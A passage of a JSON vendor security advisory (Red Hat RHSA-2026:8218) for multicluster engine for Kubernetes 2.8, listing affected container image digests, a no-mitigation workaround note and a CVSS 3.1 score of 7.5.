"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:4100f29f8a8ba48956cc570cc2a65bc38b9fffa9b946fc3c6253bd0a54f25065_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:850c60717c0c3a8cdc7bb742721e73dbcd8928443fb6776003e3ca71fdd17982_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:c9e8a0a70d60dd717a2f9c8018f1ce963ce25079476a64e8743e826e616ffb00_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:d7dd81c6f47faf4e07602dfed2229b27d8064d8180009b4bc62189030575d421_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:24c9f0cb19b5e95ee037583eff0c5e683c98d65868f57221e36db1fe1aaad96b_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:4def0b462d24131336a8f641edf6206d9eac005b61d1abd3739b549e74794ee9_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:659a041590140f69a2a0952769a53240e12d770cb7440fc0ac1af4198470e684_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:fd72d5e49c2d10e1ccb16547ee8563ad5c1c4a09960f6c3563b8f394e031c50e_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:8218"
},
{
"category": "workaround",
"details": "Red Hat has investigated whether a possible mitigation exists for this issue, and has not been able to identify a practical example. Please update the affected package as soon as possible.",
"product_ids": [
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:8726da36d26d647248ec7d0a38c37760a86b909d5e32535cd79573ba73418e65_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:b0c5ea5c0c5cb1ffb39a18da2d69714adeab262037769c8bb61a08165a9b249d_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:e7d9e3b4d184144fe0048620e63f8605ba70ff6ba6b5f91d911facbe2cc43dc9_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:f6bf8d199b9346b82197c5911b00d4a7a6cb9b7c84d5b0c3d5052aee07e23f53_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:553edf965192cf55bc245e8a3bbf3a27545d62d03d311acc24062a2554a2e85f_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:5d7b59bfe6851def3f341bfad75ef2e6fcea8cc77ea3268167519f8d3bae5c33_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:6abe1731496380fe823109b6acc4415130e65d51722e27da134eb79f0a3f4f18_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:baedd408112b3fbd00b03ff80f5bf1afc390250aa5aa07ed4e83aadc5ea47e4c_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:797e7b8b8dd7e769d8af43c94076e17b0e9dad73121bafd44368b95c0e5b21d2_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:a368438d68a76db54dc21edee2a9dfe0356201730e5edaf3efe2e5d35cf4812b_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:c18392461e4b948a1e269a91750048df39b06512e0c12b35ca2bfcbd7cbfc6bc_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:d4e3c622c9e9e9fd7715efe0675082b313811c3ad4be4d483b0bd6df4137b98d_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:384d7665ebd94ba2c06dc5039f63b2e5d9a7562c2c55dc5018a4605cb72f8159_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:6efea98320dbf13ef6b7bd24cc45b5cddc2f9368b71556770abd846f27b0b989_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:98fade294c1ff0688c36878f62275e82a2b19696c2a01edd5fa78acca4a99104_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:e26c917cc85445632f6e971636a98d5e7a0bbc3c1fd3dc647385c3ab4abf13f0_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:5e4dde4a4e91f67ad09ea3fe2b685731570fbbdab3bed1729f727ed50728f0aa_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:89623857fddc1cb6a4c00f7927adeebe64a9035b104bee39c7c4e5ca73d4161a_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:928850a95a992b3cad76163aa68c17971cd1c4d2eb4cc2aa7495fa43a03c7f9c_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:ad1094291b455efbcb67c99059f25aa0c324a8ea57f1b4917995ca8daefe602d_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:1903cc91969e1e9a9d90676abbaf6a13af2644ab4678c4354cc4c436c7d73320_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:6eaae5bbd36db4137748ce56b9bdb89440d46cf33e44deb7886742151a926233_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:ad396a22c7dfc18d3755b5226322b02cf53e9d889d8c4c0fd9f3fc18640d5229_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:f4e156751bf139839b078a9ed28ac273209573d752850d2191cf523168ecef3c_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:3aa5791c30722dc9a41b11af0e6165b16e1fbb90f9223402f15ccd1b3ab87bcb_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:61aca1200e3f76ad5608ec2fea60192281cfd8dc883ca95a952d4634b362b28d_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:74d46cd69f0ea430d4f64bb7eb2c7801552fd75180bd174afba4280202487a9b_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:d69c9156ba667438e59cb8c71a905fd92a26e830629a5c20223d70173a64a95b_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:79bbb4f57c6b596c4926a8bc3a8fb9f885f05251a6c93a903622ea18ed77f224_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:ac44ed8760e5bf9d701b3cf4296805d1df6f6b9cb57b3e0a7557239de1a542b7_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:b0c796e0d0eea701ebcb55c646042a020d71e18595e260644884596b04dd1def_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:d47167421192458b70433c97afbee742ede2a650c7af0ce54b126fa251cc1ea7_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:1ab0fe650316e0640421fbc361eae235c4a0175c7467acd5e8ad414a8fd1fc75_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:4355c558ed342b1e96f4b23c53b229d22ef4ee48378980eb7359d7864e15fe6d_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:b496e4274643266a37d7ba7134f71e3aa262df65e4c04b9148ee9d7a67da669a_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:ddda8b74fb8cbde98a90fc89c62608dce08a022c0e63ae90a1a0b52123da1c2c_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:36b56d6b9609512532fdae217b892ebc40ce774161e6f90176b052cf7ee686a3_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:575cb613c7cc81507a3e6235e30b0ffbb34f145e2bb6b97632d68ed5e73fd090_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:a8d65fb8b81be9613bc732f696ef245aad46a23335de455d258598dd86c19f8d_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:e9d6ed28fbbe6a3aeb2050c6e8fc3f8a5b6cc7546ee996006e92031294f83d2f_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:4943997b1fed0e8fada897f8296fafd2ec82c69d51f0779b0f1591c9ce2dcc2a_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:7f98a0535715ba9925f93f16c41fc2cfdc16ee8fb32654336f7c5a09b0e7d9dd_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:896deef9b7467a814e9e79a4366da9daf969b2c260ec30a517dfa30887e10205_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:a520297678ce3bd9a01a1e64b41833535d30ba469e55f26c462af1303c0f959d_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:4100f29f8a8ba48956cc570cc2a65bc38b9fffa9b946fc3c6253bd0a54f25065_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:850c60717c0c3a8cdc7bb742721e73dbcd8928443fb6776003e3ca71fdd17982_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:c9e8a0a70d60dd717a2f9c8018f1ce963ce25079476a64e8743e826e616ffb00_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:d7dd81c6f47faf4e07602dfed2229b27d8064d8180009b4bc62189030575d421_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:6a25acbc7851fdb9ab19d6f3286e50db85f07064f59a604aedaff48800b06572_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:c02087ae03cff78d4a3fba8887ef55d33cd00a8f2f74806368bf683fa73c0e46_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:c95f5edf4111dc9077d07c0c81df6fc238c6d048d22793f83f7be08bc673b9d3_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:d2cc92420cffc159ce7f27104ba9e49745198e9e3314683209624e4a1a3f041a_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:55928ce9d57439303297ac900fc0b4f95de64ee691a332a21995cf09342c1aff_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:d2949213c7c3f93b0b59082ecdc69f4e05b8038a43afc216926ec43714a73346_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:fb49af7cc738943c59aef8a8b860b00f5e854cc95d58a88461c30ebea0f329c3_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:fff7cebbf5360ae8830e3650f72b5c269be15b9892848f0a3408ed47abb5a5ad_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:4d8f346ef3bffeed12b3c64e5ebed22f8d79397e915c0bfbbc5bf03ee809c0a0_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:913120c0fc826c2f8ed1f2cba5e71c91e2c440e50be043ab912d688b230aa0fb_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:c3633df794c0803b27d8607d1391eb66af8c104712584ba326d04e4cae8627d6_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:d57138c750131113f09ce1259f5702a0d4b984fb29d5d7994c5dc4ad6aaaf39b_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:1766984333b3b3d1d1614bafef596fb94351b3358e04e32d46e20752b60a0d9e_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:17c676d8e456102d877a7feee97c7164ee9f71e21763c5561bed8ac24e5dc2d0_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:9e94ed8885a79d3c7ca3a41ffba43455b410435ea0090fb5c6598eefc5156b22_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:b078e01e6a3d6a04c2e364d42aa4a5be37bb2aa279ae484c524ae58293aacc3a_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:8edafac72bd8526384c33b749595be0986d86957b79ac7ac7ae37b435f27351e_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:9532ce55aa8e3553bd102a891ca6e2b6cf93f23da41c71ba184e769dd1328410_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:9d146a6192bc9251ceb9443e32c708cfbb7cd542f6d9621c1dbbbdff50ede9ae_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:e227cdab2e061d70761d510b0d9c99b4dcf735d0257809c6757155ef18bb341f_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:62fd673d06de31af8b7946b6eb657c69e064dc1e8639197e689375be3a331c90_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:bb9014907e1d57647589efe637bf133e631d03ac94e1c30181eccf6ea8bddc6b_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:d81f2ab37bd8c6e5aaccd0ed2b94fbc2bf88934f3ffda8fde7add64b9f051966_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:dad80c9983167fb8fd98912c890b3a1dbcac2cbadf417c7771a3fda2f23f832c_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:4be015b2648cd7f4edb2aa29521f283959db8336ce4df5497ad8465a031bd3c4_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:758c0f95e9895b61a86e3ff4f4c2570f278c7af13ad3a5876d785829b746bf42_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:9082cef0cbf513a3c33309be5e83774cf92ddae6045c571f43718583da451d8d_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:f1f8475bacfa68df75fa015dfd7fb73565ed2b0b73fe8eeec26c2831862d7175_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:11e40e57f6d48e0eba7e4ed12f4ef55b84ec9f93d2534712318d259dc4fcf4a5_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:132e7098ba9e2ac1e02e04e828359073ecc322a5e9e804badb1e0e5934ff32fe_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:3cdd76fda529eb46161cac023a40b1420d85cfe6ac9100986796e4f49ea5e7c2_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:7805f6d13f8a8a1309c2821622706e0e81c6b0a99f18ca761f031937d67fd484_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:1b8f3645dca1f463be8be4f3bbde53cfb0a28412ddc7f20eed9e39b4f7f02979_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:31b3f532cfa55e76563251f01008c9998b71ba33a4dd75c3307db32173d6ff39_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:5a063e1f8a5d0ff90f7c948f332fff502fc00be8ede14bd0ef4b38ab09717c72_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:5cde57462724bc2ebd303b29d6127d2fdffcd4c4b93ea443eb6ac55290031960_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:45ef14cb6ce30aaf3780fbb5656dae822825b892e165469c0c732e613f452c94_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:9460807bdb775b166264de2b0a5eb348b144cb9a7a0b1d42190a3ce54bea8d63_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:97bb4216555694418e609366ecb47bd1c8336c1e97e76039df4949c5be4fb997_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:b9bc631124b8d4f95faf4de518915fc8bd519edf11055b703ee223c0c4813b52_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:05689e767759be2e46620c752e079847fad0941193456dad22ed33111e69f44c_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:18b0f392942a743b23dc4db9ccccaf467053e70bdad97f1714d0d413f66eaf71_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:32e1fac10eb855484152f41d6a2e4b3fa6fb9c63afd10c5d546db29916f40816_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:c0aeadd784317f5d0a5415bb2002ab6116f2c947c00fc8df9e2a91e907e108bf_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:24c9f0cb19b5e95ee037583eff0c5e683c98d65868f57221e36db1fe1aaad96b_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:4def0b462d24131336a8f641edf6206d9eac005b61d1abd3739b549e74794ee9_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:659a041590140f69a2a0952769a53240e12d770cb7440fc0ac1af4198470e684_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:fd72d5e49c2d10e1ccb16547ee8563ad5c1c4a09960f6c3563b8f394e031c50e_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:2ff4c94a03c71dc68b519db391d0b7f9787e7709df2e5d16aa837fcf522418de_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:b98f70827db37e91dc99336043552d1375cd94a7bbab3c0abcfa7f7d33b3d3d6_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:e7adcd557f69ccf4893c0f40b5ccb19264a401ea98436b5072d1b7593d120bc4_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:eeaf14966d50a750a665ef6304f3ca82b50c0cfe147acf796714ddd0642d51f2_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:126b982ac1e4ca447773a3c9099691f0ad5dca0d7a4101877724421d613c459b_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:548fe802bc62d3ff20ee0b13dcd9792eb304f11d5d496562ad1c2d80b5796c67_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:772e9e4da783b4d33ff1846a6b8fc9ab7acefe76dd21eb3030c83f6352050894_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:d6622aa3381f9ac73e6f3c9764ffe357a434d021c62d20d5a95ebb586b66d87b_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:08ffacc73e8bdd40fbd4e913971eb1621a09329c85ec123e1781c08515cf3b5a_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:174f055bd042d6ec4e056ef9f6bb430f0b7e68211ee56155aee1d02f6b26a53a_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:4248348b507e9a78095ffa9d7a2ef4ff87880f65fdfc8ae71e67018655705c53_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:de69889c3af110ae6613401431a384781ece6f82bbe2933b81dedef602be9005_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:8726da36d26d647248ec7d0a38c37760a86b909d5e32535cd79573ba73418e65_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:b0c5ea5c0c5cb1ffb39a18da2d69714adeab262037769c8bb61a08165a9b249d_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:e7d9e3b4d184144fe0048620e63f8605ba70ff6ba6b5f91d911facbe2cc43dc9_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:f6bf8d199b9346b82197c5911b00d4a7a6cb9b7c84d5b0c3d5052aee07e23f53_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:553edf965192cf55bc245e8a3bbf3a27545d62d03d311acc24062a2554a2e85f_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:5d7b59bfe6851def3f341bfad75ef2e6fcea8cc77ea3268167519f8d3bae5c33_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:6abe1731496380fe823109b6acc4415130e65d51722e27da134eb79f0a3f4f18_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:baedd408112b3fbd00b03ff80f5bf1afc390250aa5aa07ed4e83aadc5ea47e4c_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:797e7b8b8dd7e769d8af43c94076e17b0e9dad73121bafd44368b95c0e5b21d2_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:a368438d68a76db54dc21edee2a9dfe0356201730e5edaf3efe2e5d35cf4812b_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:c18392461e4b948a1e269a91750048df39b06512e0c12b35ca2bfcbd7cbfc6bc_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:d4e3c622c9e9e9fd7715efe0675082b313811c3ad4be4d483b0bd6df4137b98d_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:384d7665ebd94ba2c06dc5039f63b2e5d9a7562c2c55dc5018a4605cb72f8159_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:6efea98320dbf13ef6b7bd24cc45b5cddc2f9368b71556770abd846f27b0b989_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:98fade294c1ff0688c36878f62275e82a2b19696c2a01edd5fa78acca4a99104_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:e26c917cc85445632f6e971636a98d5e7a0bbc3c1fd3dc647385c3ab4abf13f0_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:5e4dde4a4e91f67ad09ea3fe2b685731570fbbdab3bed1729f727ed50728f0aa_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:89623857fddc1cb6a4c00f7927adeebe64a9035b104bee39c7c4e5ca73d4161a_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:928850a95a992b3cad76163aa68c17971cd1c4d2eb4cc2aa7495fa43a03c7f9c_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:ad1094291b455efbcb67c99059f25aa0c324a8ea57f1b4917995ca8daefe602d_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:1903cc91969e1e9a9d90676abbaf6a13af2644ab4678c4354cc4c436c7d73320_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:6eaae5bbd36db4137748ce56b9bdb89440d46cf33e44deb7886742151a926233_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:ad396a22c7dfc18d3755b5226322b02cf53e9d889d8c4c0fd9f3fc18640d5229_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:f4e156751bf139839b078a9ed28ac273209573d752850d2191cf523168ecef3c_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:3aa5791c30722dc9a41b11af0e6165b16e1fbb90f9223402f15ccd1b3ab87bcb_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:61aca1200e3f76ad5608ec2fea60192281cfd8dc883ca95a952d4634b362b28d_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:74d46cd69f0ea430d4f64bb7eb2c7801552fd75180bd174afba4280202487a9b_s390x",
